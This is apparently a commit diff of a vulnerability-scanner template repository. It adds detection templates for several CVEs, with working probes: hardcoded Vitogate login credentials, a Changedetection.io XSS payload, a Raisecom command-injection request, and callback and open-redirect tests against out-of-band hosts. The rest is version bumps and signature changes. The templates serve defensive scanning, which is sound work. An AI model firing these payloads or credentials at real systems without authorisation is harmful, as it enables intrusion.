{"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"} {"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"}

View File

@ -1 +1 @@
b69b59d70bacb648d224873b1b83419e 734828cf4c7ab354d5a5ccb1fed89917

View File

@ -1 +1 @@
3.2.7 3.2.8

View File

@ -1 +1 @@
1.4.7 1.4.8

View File

@ -1 +1 @@
2.7.7 2.8.0

View File

@ -1 +1 @@
18.8.0 18.9.0

View File

@ -1 +1 @@
3.0.5 3.0.6

View File

@ -1 +1 @@
9.7.0.1 9.7.1

View File

@ -1 +1 @@
7.9.2 8.0.1

View File

@ -1 +1 @@
3.16.5 3.16.6

View File

@ -0,0 +1,64 @@
id: CVE-2023-43323
info:
name: mooSocial 3.1.8 - External Service Interaction
author: ritikchaddha
severity: medium
description: |
mooSocial 3.1.8 is vulnerable to external service interaction via multiple parameters in the post function.
impact: |
An attacker can exploit this vulnerability to interact with external services.
remediation: |
Upgrade to a patched version of mooSocial to mitigate CVE-2023-43323.
reference:
- https://github.com/ahrixia/CVE-2023-43323
- https://github.com/nomi-sec/PoC-in-GitHub
- https://nvd.nist.gov/vuln/detail/CVE-2023-43323
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
cvss-score: 6.5
cve-id: CVE-2023-43323
epss-score: 0.00046
epss-percentile: 0.15636
cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: moosocial
product: moostore
shodan-query: http.favicon.hash:702863115clear
fofa-query:
- mooSocial
- moosocial
- icon_hash="702863115"
tags: cve,cve2023,moosocial,oast
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "mooConfig"
internal: true
- raw:
- |
POST /activities/ajax_share HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
[data%5Btype%5D=User&data%5Btarget_id%5D=0&data%5Baction%5D=wall_post&data%5Bwall_photo%5D=&data%5Bsubject_type%5D=&messageText=asas&data%5BuserShareLink%5D=&data%5BuserShareVideo%5D=http://{{interactsh-url}}%2F%3Fnull&data%5BuserTagging%5D=&data%5BshareImage%5D=1&data%5Bprivacy%5D=1]
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- "dns"
# digest: 4b0a00483046022100af09f14a1bcd4be57e652230a0edeb33311aa7089079b7b43a89ab4d6e5d2828022100fa18b8c9cd1e37934659cad5d0a55252f7a75aeb4e9e84d7fa33b68f17c6c97d:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,70 @@
id: CVE-2023-5222
info:
name: Viessmann Vitogate 300 - Hardcoded Password
author: ritikchaddha
severity: critical
description: |
A critical vulnerability in Viessmann Vitogate 300 up to 2.1.3.0 allows attackers to authenticate using hardcoded credentials in the Web Management Interface.
impact: |
An attacker could potentially gain unauthorized access to the device.
remediation: |
Update the device firmware to remove the hardcoded password or change it to a strong, unique password.
reference:
- https://vuldb.com/?ctiid.240364
- https://vuldb.com/?id.240364
- https://nvd.nist.gov/vuln/detail/CVE-2023-5222
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-5222
cwe-id: CWE-259
epss-score: 0.00164
epss-percentile: 0.52433
cpe: cpe:2.3:o:viessmann:vitogate_300_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
shodan-query: title:"Vitogate 300"
fofa-query: title="Vitogate 300"
vendor: viessmann
product: vitogate_300_firmware
tags: cve,cve2023,viessmann,vitogate,default-login
http:
- raw:
- |
POST /cgi-bin/vitogate.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"method":"put","form":"form-login","params":{"uid":"{{username}}","pwd":"{{password}}"}}
attack: pitchfork
payloads:
username:
- vitomaster
- vitogate
password:
- viessmann1917
- viessmann
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'admin":true'
- '"sessionId":'
condition: and
- type: word
part: content_type
words:
- 'application/json'
- type: status
status:
- 200
# digest: 490a0046304402205e4d25f934e60a71c86c0383fc9ea75d3d60a8eab84da76ba0f74a428eebbfb302200b230092cf6e1e982cf44258fe996e03cf7df7774d8e291fea40c94e96f08950:922c64590222798bb761d5b6d8e72950

View File

@ -23,7 +23,7 @@ info:
verified: true verified: true
max-request: 2 max-request: 2
shodan-query: http.component:"Adobe ColdFusion" shodan-query: http.component:"Adobe ColdFusion"
tags: cve,cve2024,adobe,condfusion,lfr tags: cve,cve2024,adobe,coldfusion,lfr
http: http:
- raw: - raw:
@ -53,4 +53,4 @@ http:
regex: regex:
- "<var name='uuid'><string>(.*)</string>" - "<var name='uuid'><string>(.*)</string>"
internal: true internal: true
# digest: 4a0a00473045022100e6a9a13cc692e12629ce4b557e8a9cdaab2f6b3df9155e2bb4f5cac00241469b0220351a6751dda75fd857b8ac90f6cdca44f5853c3c3019070572245e97c7aec3eb:922c64590222798bb761d5b6d8e72950 # digest: 4a0a004730450220203c669fae6e243c8b45e754f6caba7ed4706fef525376c00d09efea9698b787022100ada2f1608d93dcf71799ce34f986e34f83dcd70a2d7ffa05f89dbec7fd0f7b0f:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,47 @@
id: CVE-2024-24763
info:
name: JumpServer < 3.10.0 - Open Redirect
author: ritikchaddha
severity: medium
description: |
JumpServer is an open source bastion host and an operation and maintenance security audit system. Prior to version 3.10.0, attackers can exploit this vulnerability to construct malicious links, leading users to click on them, thereby facilitating phishing attacks or cross-site scripting attacks. Version 3.10.0 contains a patch for this issue. No known workarounds are available.
reference:
- https://github.com/jumpserver/jumpserver/security/advisories/GHSA-p2mq-cm25-g4m5
- https://nvd.nist.gov/vuln/detail/CVE-2024-24763
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L
cvss-score: 4.3
cve-id: CVE-2024-24763
cwe-id: CWE-601
cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: fit2cloud
product: jumpserver
fofa-query:
- title="JumpServer"
- title="jumpserver"
tags: cve2024,cve,jumpserver,redirect,fit2cloud,authenticated
http:
- raw:
- |
POST /{{paths}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}
payloads:
paths:
- "core/auth/login/?next=//oast.me"
- "auth/login/?next=//oast.me"
- "login/?next=//oast.me"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$'
# digest: 4a0a00473045022100836a3b8a6b0652ccba5de5d740f9ebe69c24c2ec61e316b7ff34a75a6f4b7f8e02205b9d09c0f06a3828e9e8605e0841ab78f7648a7d82361b5a506ab3b1d88cd9df:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,63 @@
id: CVE-2024-34061
info:
name: Changedetection.io <=v0.45.21 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Changedetection.io is a free open source web page change detection, website watcher, restock monitor and notification service. In affected versions Input in parameter notification_urls is not processed resulting in javascript execution in the application. A reflected XSS vulnerability happens when the user input from a URL or POST data is reflected on the page without being stored, thus allowing the attacker to inject malicious content. This issue has been addressed in version 0.45.22. Users are advised to upgrade. There are no known workarounds for this vulnerability.
reference:
- https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-pwgc-w4x9-gw67
- https://nvd.nist.gov/vuln/detail/CVE-2024-34061
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
cvss-score: 4.3
cve-id: CVE-2024-34061
cwe-id: CWE-79
metadata:
verified: true
max-request: 2
shodan-query: html:"Change Detection"
tags: cve,cve2024,changedetection,xss
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
POST /settings HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrf_token={{csrf_token}}&requests-time_between_check-weeks=&requests-time_between_check-days=&requests-time_between_check-hours=3&requests-time_between_check-minutes=&requests-time_between_check-seconds=&requests-jitter_seconds=0&application-filter_failure_notification_threshold_attempts=6&application-password=&application-base_url=&application-notification_urls=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&application-notification_title=ChangeDetection.io+Notification+-+%7B%7Bwatch_url%7D%7D&application-notification_body=%7B%7Bwatch_url%7D%7D+had+a+change.%0D%0A---%0D%0A%7B%7Bdiff%7D%7D%0D%0A---%0D%0A&application-notification_format=Text&application-fetch_backend=html_requests&application-webdriver_delay=&application-ignore_whitespace=y&application-global_subtractive_selectors=&application-global_ignore_text=&application-api_access_token_enabled=y&requests-extra_proxies-0-proxy_name=&requests-extra_proxies-0-proxy_url=&requests-extra_proxies-1-proxy_name=&requests-extra_proxies-1-proxy_url=&requests-extra_proxies-2-proxy_name=&requests-extra_proxies-2-proxy_url=&requests-extra_proxies-3-proxy_name=&requests-extra_proxies-3-proxy_url=&requests-extra_proxies-4-proxy_name=&requests-extra_proxies-4-proxy_url=&save_button=Save
skip-variables-check: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src=x onerror=alert(document.domain)>'
- 'is not a valid AppRise URL'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200
extractors:
- type: regex
part: body
name: csrf_token
group: 1
regex:
- 'name="csrf_token" value="([^"]+)"'
internal: true
# digest: 4b0a00483046022100a26d7a719f6bde174ab2a4ce1f996610abd24a3fe1dd22367ddfad90424a604a022100ceb749dac5236c2e827d447cb1709f0895ce46da346dead8eb19b2634d6ab9f8:922c64590222798bb761d5b6d8e72950

View File

@ -49,3 +49,4 @@ http:
- contains_all(body_2, "SQL logic error","table exp already exists") - contains_all(body_2, "SQL logic error","table exp already exists")
- contains(header_1, 'psession') - contains(header_1, 'psession')
condition: and condition: and
# digest: 4a0a0047304502207a2fc8ad9c41d36e76e2405dd372a3c3b1e23cdb7aae86fe21aa9395e37fc307022100a6abdb6d7d79e5715931d0216fa0a2f44d2adb4a35fe03b29b776e2fa9b2d5ae:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,46 @@
id: CVE-2024-7120
info:
name: Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90 - Command Injection
author: pussycat0x
severity: medium
description: |
A vulnerability, which was classified as critical, was found in Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90. This affects an unknown part of the file list_base_config.php of the component Web Interface. The manipulation of the argument template leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272451.
reference:
- https://netsecfish.notion.site/Command-Injection-Vulnerability-in-RAISECOM-Gateway-Devices-673bc7d2f8db499f9de7182d4706c707?pvs=4
- https://vuldb.com/?ctiid.272451
- https://vuldb.com/?id.272451
- https://vuldb.com/?submit.380167
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
cvss-score: 6.3
cve-id: CVE-2024-7120
cwe-id: CWE-78
epss-score: 0.00046
epss-percentile: 0.16951
metadata:
verified: true
max-request: 2
fofa-query: '"<TITLE>Web user login</TITLE>" && "<META content\==MSHTML 6.00.2900.5583\" name\=GENERATOR></HEAD>"'
tags: cve,cve2024,intrusive,raisecom,rce
http:
- raw:
- |
GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo%20-e%20%27{{randstr}}%27%3E%20%2Fwww%2Ftmp%2Finfo.html%60 HTTP/1.1
Host: {{Hostname}}
- |
GET /tmp/info.html HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- "{{randstr}}"
- type: status
status:
- 200
# digest: 4b0a00483046022100f825ff9aa104f675a7d11ac402b1eb594688591c3cef8dbab4feb41cc065f415022100b74ba964b5441d9580eb432a280ebcd4128fe1cf70e37b61e6855f8405877bf2:922c64590222798bb761d5b6d8e72950

View File

@ -45,6 +45,13 @@ http:
condition: and condition: and
part: header part: header
- type: word
part: body
words:
- 'accessToken'
- 'AdminFirstTime'
condition: and
- type: status - type: status
status: status:
- 200 - 200
@ -53,5 +60,4 @@ http:
- type: kval - type: kval
kval: kval:
- accessToken - accessToken
# digest: 4a0a00473045022100adf8a4c12e354461e80b4a00ab99ae10c5b82fefee98c10029107b3d2063620f022060eb930abe08c48fa92c7e817046a6a999feabe76aff9b2e6052a78f877c6e9d:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100d7669b05e2b655bf42189bd5a1f1c6d312b55ef0f2226d74125a06af7716cb4c02200e5bbd064a3fa4485e6a2e29f0df4dae44e75252a08137974489591ca8e284c5:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,33 @@
id: changedetection-unauth
info:
name: Changedetection.io Dashboard - Exposure
author: ritikchaddha
severity: medium
description: |
Changedetection.io unauth panel detected.
metadata:
verified: true
max-request: 1
shodan-query: html:"Change Detection"
tags: changedetection,unauth,exposure
http:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'SETTINGS</a>'
- 'Change Detection'
condition: and
case-insensitive: true
- type: status
status:
- 200
# digest: 4b0a00483046022100f4b0ac9c92eab0ea4d6fe36f3ec453a9b691a2148aafe9f281e9f6efaa1321b7022100c1e4e18be5f9c2ee3252c843294e680b6f1db68a590357408673dc56d9115085:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100f36c560f74676f791f1934da3e3fa2a1c34045ba97b7cb378f6da7118e1372f5022007f4901c1254dbe0ea148b66aeda99bde7c358a4e8ae6914cd6aa459c03d00b1:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100bb21c1a47541da16e8bda0d6b7655bac6e4c0501f14293739586047952f741cb0221008e68d88a15b4ea97a4744ffe7ef8235a34b0f2a3e08df42d3e886a9030ee1a59:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a00463044022047b773e54b7d2133d0d0a410d1af46f4040e06e6117e1aaf3a95d0d69997c53102203b01dcf3bbf908b9abe4da67f2a9e9a0ed22ab9150241be31cceefa91ea2f015:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100a96ab15ddb89d8065dbf2aaaab430e20d82439033be26c342aaa13ab6b30485d022100d2bebd77742fa09a8178c6ea4cb0434ae71bdd06dbb16aa64844ed35d5909f3d:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402202ce33574e3b018b75d389fee9fd3636b5aece92b5e58066a53bc43324c9dd57a022012815c05d76395e0c8f9b873d4552fb60b841e9472f8f26219c3fcdc3ecdb697:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100f666e6fd4c4a8dc99c92bda47f10e36a8558d666e8eb895a83e1636f89a6a87602200ed373b3a15fe11b1b58d67abaa577d8f8d2f76ed38931c60ea172cc708af9ce:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100f90b5c64f5e2ba5400e345f2353252f8e98caac3c2cb1efce0a55e06d9cf430702204c18646406c16f03608d01b9371e1081844c8014a696f3323d212b6409506c5f:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022015e0aa337a86699ec98fe00b80b4f3f2f53e8f5a5a86dc2221c348e4f3037db40221008cea985c8f92186bcbf6605558c8fdb9200d9426692101f40ae95ef239c4722b:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402203a6f0c7df79a258c742fa868a964e4d46b86919a8f39c7cf64ca675cd14e819e0220344e033ed04d94404ef0949f46cd8fa71098cf8fdcbb53d9e9816fba491214bc:922c64590222798bb761d5b6d8e72950 # digest: 490a004630440220554eff996af197cd8fbfd6eeefb3959e5dffb907a99939dda5ee543908619b51022024e9187952242074e1cf7995bade104c2496b7cf711f118003a04fd33b349692:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a004730450220330d517911db2bc4a00124e36e514a002d8b4b0b637cc8d21b1784fe0e6ed24e0221009cdc038f99a2261a42cb4439b895391b8fa3425a9fc424a8d7629e81d56166c0:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100e044b71e883a3edb2bc724d1c8d2a269d27475c212d844d67fb85a82eb03ba1c022100e2cd7e62585b6363649103f00656850fb4b03a709c07a41a47bd2995787ba4d0:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100f2b34731b9796a79058fc0d2e1d69d4f513380815ab86f9e45c880f0bc31a3550220057119ebd81bf898e2e82519d16dd291266a88f231e4b8292c8066da7ce04de8:922c64590222798bb761d5b6d8e72950 # digest: 490a00463044022069ffa28f501d1c8c8bc5c2b0ffca5f5712212f3038cd905e9ef62ec94cd792fe02203d6333298e0a1bca424dfb676ea314fb79747549696d2382fd7df8dae793da16:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100a621799f480dc9d982f6aef8eeeccefeda6dea8b96d7fdebb8222431fe45b8ef022100896a5f6c53544a89128a7b1b67692a28789ab443f1b110407b8722a6c89fb8b3:922c64590222798bb761d5b6d8e72950 # digest: 490a0046304402201888151a74948f6f450782d958e7c94aa6fdbd464334df3f38556d6a0c0493d202207340a2f97036e32848bcd2d158b9ab58e451b9bdbc9e99091a6b1393ab29bd9a:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402202e739a62b48fbd873d766243f85310b8e9c048817c16e45cb6e291f2facbb41302202120965ec8596a5d028c5a500e2b77d45e5946a3cd55dcc75ededef61a616b70:922c64590222798bb761d5b6d8e72950 # digest: 490a0046304402200cfd7ea8d09607ce19cb3acc996f8edf04c248af9219f5179981f18cfc58e67b02204617673cd30134d4eb6009ff9dc057e466ab06d1c0937a1a936504a11346655d:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a00463044022045ef2ea384c7b3f098ed5fcda2db643c76e4a4b563cb667ab6000511dfd1bf6b022018451c7b800c7bfac41fe3f50ff82f70b557c7fc0637e26902423c7322ff00c3:922c64590222798bb761d5b6d8e72950 # digest: 490a00463044022053629a1f8dbc2129095bc0c59e624420cf6f9e58fc895f6282ef1b6868d0448c02204be07a1b073c13687090a44dec6d0885d4a863cc2313d50a6706037a6e8259bd:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100ec5fc96a9c62987b9914f1748ba08f441cd5c72a2d13b80e11d3230800e43ff90221009554c7e89e0f62d841c998c0313bf3bc79dfabee85db79f39037d5c32fa5d14b:922c64590222798bb761d5b6d8e72950 # digest: 490a0046304402204090c001c08407db2736b0c1bce27aeef80dd07e6b0bc19ed3f9591889e52d1102206f71b893e4efaaf9780e9c761a836e372aa8951fbc6f019e5aef9ae9a6f159ac:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100aeedc10cdba61c2286e89cb8182a37c95ee8157a342aa873c1ce5005346446460220453a05274572ba573b4691cab5ea826c0c3d202f56f0a6ebeb7e83df09927744:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100c2ac2c5c4018dbc04d013e7dd6d6329aed676865ef8daf43a4f4b9051ea72721022004f0f4abb9a29928fda90d6ef7c47fba4c9b83961dc300901fa03106a2677ac2:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502210080833f0a6f6965bf701a9f8f85c42f13aced2edfa3c92f35b7bf9b2949f30c92022010f4ca3a59b6d406300c386db8a6df73c29dbe232100869a5813747db8f85ee1:922c64590222798bb761d5b6d8e72950 # digest: 4a0a004730450220166a059abad47d7810570e6774f74158bf750b6709c96a77756130e70d29cbb2022100bf66279eb5123f8cecc13dd1ed4087eeeb0d072eaffaa41977a70cc829785c27:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100f1d2f7f6be6fddf20850b4703b6ab5b8d957c3e74b071534c1bc6ad7fe41436502202a71f99ce82762f27add68abbe7a23d4240623238e94b985bfca1ee61f0d6da8:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022017ee505dcca18ebab680043b9925f57984d15f24be30f3f0ec870f6a7dceeca8022100abfbd24fce7dae963b3ed486a507e06d30ba8df3471283206e59a6eca66a25e3:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402205c5109cf3bacc2b8cc218a17cfe92ee3fe4d72de8ac73e91373f19d9b8c3d31b0220238301247108e18a2cba0ed47c36b28c5c8faecfd5240ec31685b0d90441bd88:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502204016d00b414a89aa5ee3e46fd9bf70b4e6e52f59a21d6c051a3649b5ddcc3e6e022100a287c6b188915ed6124a9a1d037cfa445780b9e261d0d4dba376f3f2905f6a67:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402203e53d59041d41a70647f545a55fcfdff1cdbc2a49aadf9b5f659ae93371918d50220098775c59e3b87e6be78842156c7241c18d7a0b357642133f15f77be8d7cab55:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100fb0d6a1c264fd9f2133b11d868175b69427130562ffeda26f311e59499c31ff602204560a3e5ec893280c5d927554304b0ef9a401f8f515662c0c8853b675f89956d:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100a1ddd14f6387bf2982f4bce8fbc3a4947b77511c0efeab680f998557dd7fe530022004d54454b173b3799de58a0775b79229217011002c27b5e37f88e9c4153b93b7:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100d6a1f77e361161159079a8c9808d996b8f300de6e7f9879c44b7a5fcbaa754c70220549f66c482dc25ce5859081734f6859d254dcb5e1faf2a50059fb884d889a3b0:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a004730450220199adf3dca06dbafdf15f58c0e059c580c690a47298d88590d067df01557fe3e022100bb1480a6c06a9560a4d844220066a6513f5332c08eff31695cd0d53e308d17f3:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100dc067167944e4479be804de00ef189955c02218d61594796a5528c5f14efbeeb022100cc886ea0fd38c9f26a26735b898b0e92d2664441cf3da7f97fbe0a0781348354:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100d8bf8d7d16e101d6da570588e7d4bda90f3928c5b700764a4e8ac07ca18ae480022100e11a1d19fccc35366ea3bd589f834d04b6ec9ca887e3418c8e53a82ee433cd40:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022012e44aec7725638cd18ee6ca09389a5b8a098851e09d76c0c61463e5ef87dae2022100c5cd95f4d634e51f124e0b09cdeb6f6d59c56a90a1375be8dcc0b966437f6102:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402200cfe429a4d25d4c22eb6a61b7b52d17ebe6c552dd47c64b762c5794e6f97adee0220686ef471e2c5d52316f84fbd116e2399d3593896d23ba69b8dbb1a512672f4f1:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502206a7409f7c925e71550c67e07908d0b5984127972a2d98e5f0a71db575e87482b022100e7b8b47bdfc6245558f4e851998901f5eee2ba79bf99f77e4bcaa77c1dd32e8b:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100c01646b0575cf57b2cb4501545ed40118eaacea85bcd059deb9ca88cab465cbd022100ef8a8c51ab8767a3f508b14e58f2398285c81a59f4ce9db52471230d7580d406:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100fe4d7a22bfa930cc84cf3e766d3d24b173cf9ddddec0e2909659ab7b9edac8170220428436f17b011cd10dde2133a64ee98ab25db91ec1198ff9e081e40a1cec7891:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022032b67759d95061453c79b65aae1ce69db442ef30e8c3862cefc1fbe2330af108022100e6254d64680e63f7d2d8a7f7af20e6ef835244a4b1c44b2fbb88d6bdd4705a0e:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100f42a4cae6ddf40b5c8d65917db76e4a736afe8b4a5aaa4bd8cd70e04660e82b40220502b93dc5c68027663c8a3529cb4074ab0e7296354beda213a9ba553056eccd3:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100fbbca3ca6c09d499a91c098066a03d7f924acb85fe36cc16576ac9e094ac6a2f022100933b104bbfea964358b544b4d3f7d430eb5a36fac2ebe8b092fa17a7c9e469d3:922c64590222798bb761d5b6d8e72950 # digest: 4b0a0048304602210087f1678cdce7b228c96bc3fa1c81648cb1778f9d7e529fd4e3af9eabbcb80f56022100e21925e821ab239facc011f7be0a73ae79116a36a6393149d76d53b2678aaf5f:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
- '(?i)Stable.tag:\s?([\w.]+)' - '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502200a4a26539eb02e22d38401adebe67d953400c3c14e580580d4a8fc3d754ecfcd022100c25d7740d7c685f9e94fbdca6ff1d44d10c350b9f1c81bed889328c190d86f49:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022011b93e838a576f4d3d9beea54328017dd16c648cbe1ddfef8a05c597517f072b022100b1cefc60d6ccbd4614b41f2823da7842e4285c1ddb7cecaadbfc03d732f87e8d:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,4 @@ http:
part: body part: body
regex: regex:
